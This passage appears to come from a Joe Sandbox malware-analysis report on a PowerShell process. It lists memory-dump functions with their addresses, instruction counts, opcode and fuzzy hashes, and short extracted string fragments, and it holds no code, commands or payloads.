                                        • Source File: 00000004.00000002.1952510481.00000000078B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_78b0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 84el$tPp
                                        • API String ID: 0-3684998385
                                        • Opcode ID: 18a115d3b0898c2e1c5ee3a15a6b0090c054fa70bd01f59642f028cf0a0e59c7
                                        • Instruction ID: 14df7d7c2133456b601fd4a60c041ca9507e6f3298157adf7106e96ca3517270
                                        • Opcode Fuzzy Hash: 18a115d3b0898c2e1c5ee3a15a6b0090c054fa70bd01f59642f028cf0a0e59c7
                                        • Instruction Fuzzy Hash: D05181B5604205DFC735CE18C540AE9BBE2EF99320F198499E949DB391D771F941CBA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 078B7808 Relevance: 1.4, Strings: 1, Instructions: 105COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1952510481.00000000078B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_78b0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 4'p
                                        • API String ID: 0-481844870
                                        • Opcode ID: 05c85d72a52d80af86dea396a6aa94b890f97a07ffacce71f614ca4c83ecc666
                                        • Instruction ID: dde47fdb4c729a3eccb8e6a1aa02bd6679893c04a2d8048195cbbd38e62f4d79
                                        • Opcode Fuzzy Hash: 05c85d72a52d80af86dea396a6aa94b890f97a07ffacce71f614ca4c83ecc666
                                        • Instruction Fuzzy Hash: 42418CB0A0030ADFDB34CE39C145BA977A2BBE1314F1881A7E818CB3A1D775D980CB95
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 04A837B3 Relevance: .7, Instructions: 689COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1941702138.0000000004A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_4a80000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: bc5f7ded54bba53d1ee413525afd0a043e240bd1c71b0a23778821f3046a3cf2
                                        • Instruction ID: 9a877ea667486aac6a4e5ea1de9fc852a16c102704592a733bb7aeb9a7137fed
                                        • Opcode Fuzzy Hash: bc5f7ded54bba53d1ee413525afd0a043e240bd1c71b0a23778821f3046a3cf2
                                        • Instruction Fuzzy Hash: C3525A74A05248AFDB01DFA8D494A9DFBB2FF49310F25819AE844AB362C735ED45CB90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 04A8DB40 Relevance: .5, Instructions: 538COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1941702138.0000000004A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_4a80000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 95f520620fdcf84aed85e3ff5432dad97e8de4a8ea65d921c62febbec2be8894
                                        • Instruction ID: 11c9ae26fd30563a73d1e290ff184533f4c6b1e5fa399ed2932821333cc92755
                                        • Opcode Fuzzy Hash: 95f520620fdcf84aed85e3ff5432dad97e8de4a8ea65d921c62febbec2be8894
                                        • Instruction Fuzzy Hash: 7B224C74A01218DFCB14DFA8D484AADBBF2FF89310F258559E844AB361C735ED46CB90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 04A8D19C Relevance: .3, Instructions: 288COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1941702138.0000000004A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_4a80000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6bbb3ae1fe602835ce9b1a9712bc592591e19edfbf19213280697f75143c1fd9
                                        • Instruction ID: 477694e2fc0243a7631717478747323c4e19fb823e49c2edad96e5b41160b913
                                        • Opcode Fuzzy Hash: 6bbb3ae1fe602835ce9b1a9712bc592591e19edfbf19213280697f75143c1fd9
                                        • Instruction Fuzzy Hash: 75B13C70E002099FDB14EFA9D985BEDBBF1FF48314F14852DD815AB294EB74A845CB81
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 04A8C8CC Relevance: .3, Instructions: 278COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1941702138.0000000004A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_4a80000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: dc141f4c1348a0dbf4528b0b1e12dea674b582399bd98c836497df1bbb741c42
                                        • Instruction ID: ebaae9cfb00777d62cbccdfef2479418ad880c39a5a25c5caff951fcaf11cefa
                                        • Opcode Fuzzy Hash: dc141f4c1348a0dbf4528b0b1e12dea674b582399bd98c836497df1bbb741c42
                                        • Instruction Fuzzy Hash: ABB15F70E006099FDB14DFA9D885B9DBBF2FF88324F14812DD815A7294EB74A845CFA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 04A84380 Relevance: .3, Instructions: 254COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1941702138.0000000004A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_4a80000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 14da730bcbf0e150d8aa2081bd02e77806aaf8363c9a84f42b8d4bf0944a63f4
                                        • Instruction ID: 7f96a26cfe4520df9ec6f8b4fa69e38c35195af8164a07f174edf8afa42a57ff
                                        • Opcode Fuzzy Hash: 14da730bcbf0e150d8aa2081bd02e77806aaf8363c9a84f42b8d4bf0944a63f4
                                        • Instruction Fuzzy Hash: 0BB1E674A00209AFDB05DF98D484A9DBBF2FF88314F298159E804AB365D771ED82CF90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 04A82AA0 Relevance: .2, Instructions: 245COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1941702138.0000000004A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_4a80000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 65dd1e4ea9a11b659ffc37cd63405d5f5939d0053ceb0ab9a68fd2d54e129d90
                                        • Instruction ID: 3027e01ad08934ef3448c132b118af8b802a7e98495a8ad73c430cfb20e340dd
                                        • Opcode Fuzzy Hash: 65dd1e4ea9a11b659ffc37cd63405d5f5939d0053ceb0ab9a68fd2d54e129d90
                                        • Instruction Fuzzy Hash: 76A18D75A006059FCB15DF59C494ABEFBB2FF88310B2486A9D815AB7A5C731FC41CBA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 04A8D6A8 Relevance: .1, Instructions: 146COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1941702138.0000000004A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_4a80000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: cd0f06aa6b05d143512de14852a35cf4762cb01e35f90b3a11806e867b2ca4cd
                                        • Instruction ID: c1829237b1c45e1e674a00f7566a93a3818d503767b1d42232e3ce9ad9f1eb52
                                        • Opcode Fuzzy Hash: cd0f06aa6b05d143512de14852a35cf4762cb01e35f90b3a11806e867b2ca4cd
                                        • Instruction Fuzzy Hash: 29518BB4A002099FCB15DF58C894AAEFBF2FF88310B248569D845AB3A4D731FD41CB90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 04A8F9E8 Relevance: .1, Instructions: 132COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1941702138.0000000004A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_4a80000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f74f0035fb1331f323e2b46210d5c55c06d382ee0dca140d89654de6f755d9c9
                                        • Instruction ID: 454bd600ef67d6b2ab40c1453f7e339c8a69e50558a13683f039da89f41528ac
                                        • Opcode Fuzzy Hash: f74f0035fb1331f323e2b46210d5c55c06d382ee0dca140d89654de6f755d9c9
                                        • Instruction Fuzzy Hash: 95417470B0020A5EEB10EBA5C954BEEF7F9EF98300F50406EE915E7280DB74E901CB61
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 04A84597 Relevance: .1, Instructions: 117COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1941702138.0000000004A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_4a80000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3fe8391d8db5dab8ebdaadd316741c2d4dadd3e9eed903f5a6076a267e729885
                                        • Instruction ID: 82941efcca231bd6bee826ac9445511e0e5c2d61d4d202dc64150ae3d2c80c7f
                                        • Opcode Fuzzy Hash: 3fe8391d8db5dab8ebdaadd316741c2d4dadd3e9eed903f5a6076a267e729885
                                        • Instruction Fuzzy Hash: 3051C634A00209AFDB05DF98D484A9DBBB2FF88314F298559E404AB365D771ED82CF90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 04A82BB0 Relevance: .1, Instructions: 112COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1941702138.0000000004A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_4a80000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b59dfc74c279148bfa4fe61a9d6fa2f4492966abc02d859b0681c6e761d4a36e
                                        • Instruction ID: eae4af3ccd7dd3fa972c1e707f06ea5c0460a9c9e287e73d673777bf746d0d24
                                        • Opcode Fuzzy Hash: b59dfc74c279148bfa4fe61a9d6fa2f4492966abc02d859b0681c6e761d4a36e
                                        • Instruction Fuzzy Hash: 324158B5A00205DFCB06CF59C094ABAFBB1FF48310B158699D805AB7A5C732FD91CBA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 04A83949 Relevance: .1, Instructions: 111COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1941702138.0000000004A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_4a80000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: be734a8a44913b5eb56938b949bd6a217211e4157d8200971cfb326ba9e08d57
                                        • Instruction ID: 994b41a9b5546917c68975fde06c411c324665e7b4d24d32acc0cb93ab1f194e
                                        • Opcode Fuzzy Hash: be734a8a44913b5eb56938b949bd6a217211e4157d8200971cfb326ba9e08d57
                                        • Instruction Fuzzy Hash: 0B41C974A00208AFDB05DF98D494A9DFBB2FF88714F248559E804AB365C776ED82CF90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 04A8D698 Relevance: .1, Instructions: 103COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1941702138.0000000004A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_4a80000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3332774b4b17afc33655e70f9a850c3618c88d763f3012276ca8e667a1b15163
                                        • Instruction ID: 34cead5114ba86a588ccda7dd30d4604b9f60bd90f6e8f38d001f34288c3582c
                                        • Opcode Fuzzy Hash: 3332774b4b17afc33655e70f9a850c3618c88d763f3012276ca8e667a1b15163
                                        • Instruction Fuzzy Hash: 7A412BB4A002099FCB15DF58C894DAEFBB2FF88314B248569D945A77A4D732ED41CF90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 04A83240 Relevance: .1, Instructions: 92COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1941702138.0000000004A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_4a80000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 368cc66dcc8275f85c61967e4c81fd5d6a2569157f20c28c3465eb9048f1acc1
                                        • Instruction ID: 12af4e01288379a79e93bb8df88ca2bfaff53d8c5128b4b037d5c49467aa67d0
                                        • Opcode Fuzzy Hash: 368cc66dcc8275f85c61967e4c81fd5d6a2569157f20c28c3465eb9048f1acc1
                                        • Instruction Fuzzy Hash: C3318F74A092559FCB02DF58C8909AEFFB0FF4A310B15419AE844EB7A2C735EC45CBA5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 04A89A98 Relevance: .1, Instructions: 92COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1941702138.0000000004A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_4a80000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d7b272ffcda2818c589ff35d55fdc2eab85dba96cb3037afffcb45ea15993647
                                        • Instruction ID: f22518d67bcafc1e071e1e6308a5d77722d9b40dfb037a83ce1a3029eace07be
                                        • Opcode Fuzzy Hash: d7b272ffcda2818c589ff35d55fdc2eab85dba96cb3037afffcb45ea15993647
                                        • Instruction Fuzzy Hash: 26312E34B011189FCB25EB64C8556EEBBB6BF49304F1444E9D909AB351CB359E86CF81
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 04A8F4B8 Relevance: .1, Instructions: 77COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1941702138.0000000004A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_4a80000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 81e0d1c1ca7770d8022e1c757023e7d71baf29635072ea9dee503e87cfee2a87
                                        • Instruction ID: 12c327c4446ae2cdfc7441974a2523cb47699a7fb3cd86297d34b9a906813e16
                                        • Opcode Fuzzy Hash: 81e0d1c1ca7770d8022e1c757023e7d71baf29635072ea9dee503e87cfee2a87
                                        • Instruction Fuzzy Hash: 31316070200742CFE73AAB25C0487AAB7F1EB84715F18486DE596876A1D779F885CB81
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 04A83270 Relevance: .1, Instructions: 74COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1941702138.0000000004A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_4a80000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 39e7493558c0ae1af2ef16d0c42faf80ec7b11ddb3fd926a7fc393b79bb841de
                                        • Instruction ID: bc2076a4202d06ccf370bd529f286e5cb1e1ac27860ca1d6488ce9222d86ab6a
                                        • Opcode Fuzzy Hash: 39e7493558c0ae1af2ef16d0c42faf80ec7b11ddb3fd926a7fc393b79bb841de
                                        • Instruction Fuzzy Hash: 3F2117B4A042199FCB04DF59C4809AEFBB1FF49310B15819AE909EB761C735FC51CBA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 04A846A4 Relevance: .0, Instructions: 48COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1941702138.0000000004A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_4a80000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8cfbf784c487d00beaee1b6986fe59006d0436646f7dfc91814171d8f2cb7d50
                                        • Instruction ID: d573fdb711113b9d718a243a6ee60b3f201ad37ecac0b2de074a903927e059a5
                                        • Opcode Fuzzy Hash: 8cfbf784c487d00beaee1b6986fe59006d0436646f7dfc91814171d8f2cb7d50
                                        • Instruction Fuzzy Hash: C411A774A00209AFDB05DF98D884A9DBBB2FF88314F298559E405AB365D771E982CF80
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 04A83A44 Relevance: .0, Instructions: 47COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1941702138.0000000004A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_4a80000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a0fb1b3ea712eb70f74a4ea5a1ac3560a753a29491fa37e5681b9b17f4c9c577
                                        • Instruction ID: aac3f503f68f44a67c246bd966b84d41ce8197536bcdad1a6ddd8dbcc0cf1e7b
                                        • Opcode Fuzzy Hash: a0fb1b3ea712eb70f74a4ea5a1ac3560a753a29491fa37e5681b9b17f4c9c577
                                        • Instruction Fuzzy Hash: EC11A774A04209AFDF45DB98D484A9DFBB2FF48314F288559E805AB365C772E982CF40
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0314D006 Relevance: .0, Instructions: 47COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1941385171.000000000314D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0314D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_314d000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3d2e6df39340192bba0a5a7ea8ece8005b440e5e8280736d1e79c9f0d144a0b6
                                        • Instruction ID: a79e232aa72fee6f361455fdaa11ffaaef0e1673f0ed25d2193fa8291dfcab01
                                        • Opcode Fuzzy Hash: 3d2e6df39340192bba0a5a7ea8ece8005b440e5e8280736d1e79c9f0d144a0b6
                                        • Instruction Fuzzy Hash: 3D015E7240E3C05FDB128B259C94752BFA8EF47224F1D85DBE8848F2A7D2699C45CB72
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0314D01D Relevance: .0, Instructions: 45COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1941385171.000000000314D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0314D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_314d000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3038b34d05858a1b3149f283f57391451da4960da8491c8261c9ee3fcf4824a9
                                        • Instruction ID: 970cd01999284cae8e0edb502f1eacbf672b159c392da9336309338ead31da41
                                        • Opcode Fuzzy Hash: 3038b34d05858a1b3149f283f57391451da4960da8491c8261c9ee3fcf4824a9
                                        • Instruction Fuzzy Hash: 0C01D4314053409BDF208A29DC84B67BF98DF45324F18855AEC495B247C378D942CAB1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 04A8FE8F Relevance: .0, Instructions: 22COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1941702138.0000000004A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_4a80000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 82dfcc8bb3f2529fe8ed1c95cfdc2f61424d36f354da8a43967ca2c1a633f7f1
                                        • Instruction ID: dec51e41e486ea765703c6798a8f41cc00d0ff0bba7ab7089ff193eeae2b6343
                                        • Opcode Fuzzy Hash: 82dfcc8bb3f2529fe8ed1c95cfdc2f61424d36f354da8a43967ca2c1a633f7f1
                                        • Instruction Fuzzy Hash: 91E0863995400D9BCF04BFA4E45A8FD7F30EA0424AF41416ADA4B92280AE642967CFC1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 04A8FEA0 Relevance: .0, Instructions: 15COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1941702138.0000000004A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_4a80000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a69612c16c4a6368e96e58f1716c952ff4bcf7c6d5a9f3ba6230d29bd26d2bdb
                                        • Instruction ID: cd11d01d15fc298ed69c5d664bc2b974f4cb74e564b796977d19f89ae00b1756
                                        • Opcode Fuzzy Hash: a69612c16c4a6368e96e58f1716c952ff4bcf7c6d5a9f3ba6230d29bd26d2bdb
                                        • Instruction Fuzzy Hash: C2D0623490550E8BCF08FB65D45B8BDBB34EA10246F414159DA1B92591AA742565CE81
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Non-executed Functions

                                        Function 04A8C590 Relevance: .2, Instructions: 238COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1941702138.0000000004A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_4a80000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a809482299f91e158a14d6045ea5c8b7e6efed830580b35ea74528049993ad53
                                        • Instruction ID: 62ab41c54a306cbeb8e7555469bcce093530e4f4ed9e138c821d2c13abd6316e
                                        • Opcode Fuzzy Hash: a809482299f91e158a14d6045ea5c8b7e6efed830580b35ea74528049993ad53
                                        • Instruction Fuzzy Hash: A2915CB0E002099FDF14DFA9D9857ADBBF2EF88324F14912DE805A7254EB74A845CF91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 078B2848 Relevance: 15.4, Strings: 12, Instructions: 423COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1952510481.00000000078B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_78b0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 4'p$4'p$4'p$4'p$4'p$4'p$$p$$p$$p$$p$$p$$p
                                        • API String ID: 0-1881991961
                                        • Opcode ID: 1030dc11d18bf04f07c8571d53d39ea846927bb6e2c6b7fb3ca7a1f72fb47a5a
                                        • Instruction ID: a377a3b3ef4c624caa2fa7fdbdff3f949c114e628498dda9d08b7c8043bf6fb7
                                        • Opcode Fuzzy Hash: 1030dc11d18bf04f07c8571d53d39ea846927bb6e2c6b7fb3ca7a1f72fb47a5a
                                        • Instruction Fuzzy Hash: 9ED1F5B1704206DFCB359F79C8147EABBA2BFE5220F1884AAD445DB361DB31C945CBA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 078BA2B2 Relevance: 10.3, Strings: 8, Instructions: 327COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1952510481.00000000078B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_78b0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 84el$84el$84el$84el$tPp$tPp$tPp$tPp
                                        • API String ID: 0-520965650
                                        • Opcode ID: b2b9cc0f9291daadd40b7cc9bdf4d8d93f6227bd309768dac1b71dd81214f9b6
                                        • Instruction ID: d40b5a3555421bf56d8162dc4dd6a3e56d8ee157505cad20c4e1cfd0bd988927
                                        • Opcode Fuzzy Hash: b2b9cc0f9291daadd40b7cc9bdf4d8d93f6227bd309768dac1b71dd81214f9b6
                                        • Instruction Fuzzy Hash: 79C183B57002059FCB28DF58C4456AEBBE2BF99710F28C469E845DB390CB71EC51CBA2
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 078B80C8 Relevance: 7.9, Strings: 6, Instructions: 383COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1952510481.00000000078B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_78b0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 4'p$4'p$4'p$4'p$x.Xk$-Xk
                                        • API String ID: 0-1993258326
                                        • Opcode ID: f60cca8a66a11c9fbef84e4393d64f027d2ae4c9bdf2ab136e081019a73ecaac
                                        • Instruction ID: eb9a692ad31e28230ca96249955c29357fc3c28bd6d67b6b43a48c74a81f547c
                                        • Opcode Fuzzy Hash: f60cca8a66a11c9fbef84e4393d64f027d2ae4c9bdf2ab136e081019a73ecaac
                                        • Instruction Fuzzy Hash: DDF17074A01218DFE724DB58C854F9ABBB2FB84304F1085E9D509AB391CB75ED82CFA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 078B6F04 Relevance: 7.7, Strings: 6, Instructions: 198COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1952510481.00000000078B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_78b0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 4'p$84el$tPp$$p$$p$$p
                                        • API String ID: 0-746528229
                                        • Opcode ID: 53cdde5696871af68bce45a6a1c1c44388999e897b4124491a6fe4ddb026e17b
                                        • Instruction ID: 8760668ca58462596f67d5daeff79e683f1b2a2c95046e9e0807fd7eed02c9b7
                                        • Opcode Fuzzy Hash: 53cdde5696871af68bce45a6a1c1c44388999e897b4124491a6fe4ddb026e17b
                                        • Instruction Fuzzy Hash: 1261C3B070430ADFDB358E14C945BEA77A2ABE5315F18806BE805DB391D7B1EC85CBA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 078B6F18 Relevance: 7.7, Strings: 6, Instructions: 185COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1952510481.00000000078B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_78b0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 4'p$84el$tPp$$p$$p$$p
                                        • API String ID: 0-746528229
                                        • Opcode ID: 54a6e478ca5ee1555c8cb38e14422a6ccdda685dbf1abc4ad20ca1369033e2da
                                        • Instruction ID: 826a36f7bf5b03e98cd15134ee9e98bf7bc8d2fb3ef2db7d6105f50c2e756c64
                                        • Opcode Fuzzy Hash: 54a6e478ca5ee1555c8cb38e14422a6ccdda685dbf1abc4ad20ca1369033e2da
                                        • Instruction Fuzzy Hash: C061B3B070430ADFDB348E14C945BEA77A2ABE5315F58806BE805DB390D7B1EC85CBA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 078B1510 Relevance: 6.4, Strings: 5, Instructions: 147COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1952510481.00000000078B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_78b0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $ak$84el$84el$tPp$tPp
                                        • API String ID: 0-176368760
                                        • Opcode ID: fe902ef9d650f77e3def6b4a7c1ad2f6a40047b7bb42aba4743dfb461c5f04b6
